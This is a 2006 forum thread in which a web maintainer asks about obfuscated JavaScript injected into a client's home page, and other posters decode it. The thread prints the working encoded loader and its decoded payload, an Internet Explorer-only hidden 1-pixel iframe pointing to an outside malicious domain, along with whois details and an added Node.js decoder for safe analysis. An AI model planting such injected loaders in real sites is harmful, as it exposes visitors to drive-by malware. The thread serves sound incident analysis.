
Unknown JavaScript appeared in a client's home page

Hello,
I'm hoping someone might help us understand the code listed below.

One of our clients has been having unknown Javascript appear in their
home page.
The client swears that they are not changing the page and we have been
on vacation since we last removed the first 'unknown' code.

The following code appears this week on their site:
<script language=JavaScript>function decrypt_p(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,25,32,12,23,26,22,33,27,8,0,0,0,0,0,0,51,44,41,20,46,52,18,42,0,49,29,60,50,11,36,13,48,35,15,10,55,34,56,37,57,21,39,0,0,0,0,3,0,2,30,61,14,31,1,62,19,7,58,16,54,9,45,5,17,6,47,59,24,40,38,28,4,43,53);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZoLKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7fyAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiOI3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wESFwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@APOiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>

Has anyone seen this before? I did a quick search and it mentioned
something about it being an encryption technique.

Previously we had a script that called pop-up ads. We removed that, 3
days later (from server logs) this appeared.

Could the hosting company be compromised?

Any information or insight is much appreciated.

Cheers,
Ken

Nov 26 '06 #1

It looks to act upon a big old string of encoded material to produce
something written into the document.
It would help to know in what context this piece of script appeared.

Nov 26 '06 #2

drclue wrote:
> It looks to act upon a big old string of encoded material to produce
> something written into the document.
> It would help to know in what context this piece of script appeared.

The code was inserted into the body of the page, directly after the
<body> tag.
The page does not appear to have any text, other than what the client
has supplied, appearing on the page after it appears in the browser.

Nov 26 '06 #3
ke*********@gmail.com wrote:
> decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZoLKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7fyAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiOI3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wESFwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@APOiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>

This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".

The decrypt function decodes this into the following JavaScript program
and inserts it into the web page.

<SCRIPT language="JavaScript">
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
  window.status="Done";
  document.write('<IFRAME name="PageContainer" src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1" height="1" frameborder="0"></IFRAME>');
}
</SCRIPT>

As you can see, the spyware targets only Microsoft Internet Explorer,
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at

http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php

Which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007

The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.

---------------------------------------------------------------------------
http://www.hunlock.com -- Permanently under construction (And proud of it!)
Nov 26 '06 #4
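
The decoding described in the post above can be reproduced without letting the script run in a browser. The following is an added example, not code from any poster in this thread: a Node.js re-implementation of the posted decrypt_p routine that returns the decoded text instead of calling document.write. The names decodePayload, extractUrls and SAMPLE_PREFIX are chosen here; the sample is the first 12 symbols of the payload from the original post.

```javascript
// Static decoder for the decrypt_p() loader quoted in this thread.
// It returns the hidden markup as a string; nothing is written to a
// document or evaluated, so the payload can be read safely.

// Lookup table copied from the posted script; index = charCode - 48.
const TABLE = [63,25,32,12,23,26,22,33,27,8,0,0,0,0,0,0,51,44,41,20,46,52,18,
  42,0,49,29,60,50,11,36,13,48,35,15,10,55,34,56,37,57,21,39,0,0,0,0,3,0,2,30,
  61,14,31,1,62,19,7,58,16,54,9,45,5,17,6,47,59,24,40,38,28,4,43,53];
const XOR_KEY = 165; // constant the loader XORs into every output byte

function decodePayload(encoded) {
  // Forum and mail software wraps long strings with spaces; drop them first.
  const clean = encoded.replace(/\s+/g, "");
  if (!/^[0-9A-Za-z@_]*$/.test(clean)) {
    throw new Error("character outside the loader's 64-symbol alphabet");
  }
  let out = "";
  let acc = 0;   // bit accumulator ("w" in the posted script)
  let shift = 0; // number of bits currently held in acc ("s")
  for (const ch of clean) {
    // Each symbol contributes 6 bits, packed least-significant first.
    acc |= TABLE[ch.charCodeAt(0) - 48] << shift;
    if (shift) {
      out += String.fromCharCode(XOR_KEY ^ (acc & 255));
      acc >>= 8;
      shift -= 2;
    } else {
      shift = 6; // first symbol of each 4-symbol group only fills acc
    }
  }
  return out;
}

// List remote resources referenced by decoded markup (iframe/script targets).
function extractUrls(markup) {
  return markup.match(/https?:\/\/[^\s"'<>]+/gi) || [];
}

// First 12 symbols of the payload from the original post (spaces removed).
const SAMPLE_PREFIX = "rvBcveRszie7";

console.log(JSON.stringify(decodePayload(SAMPLE_PREFIX)));
```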

pcx99 wrote:
> The web server for this domain is presently down so what the iframe was
> actually doing is an open question.
>
> But yes, you can assume that the effort to purge the computer of
> mal/adware was not 100% effective.

Wow, thank you.
Could I assume that this spyware is on the host's server?

We're developing on the Mac using Text & Dreamweaver. I've done a virus
scan and haven't found anything at all.

Many thanks for the insight.

Cheers,
Ken

Nov 26 '06 #5
More about it here:
http://www.aboutus.org/Wsfgfdgrtyhgfd.net

On Nov 25, 6:42 pm, "Mr. Ken" <ken.robe...@gmail.com> wrote:
> pcx99 wrote:
> > The web server for this domain is presently down so what the iframe was
> > actually doing is an open question.
> > But yes, you can assume that the effort to purge the computer of
> > mal/adware was not 100% effective.
>
> Wow, thank you.
> Could I assume that this spyware is on the host's server?
>
> We're developing on the Mac using Text & Dreamweaver. I've done a virus
> scan and haven't found anything at all.
>
> Many thanks for the insight.
>
> Cheers,
> Ken
Dec 8 '06 #6
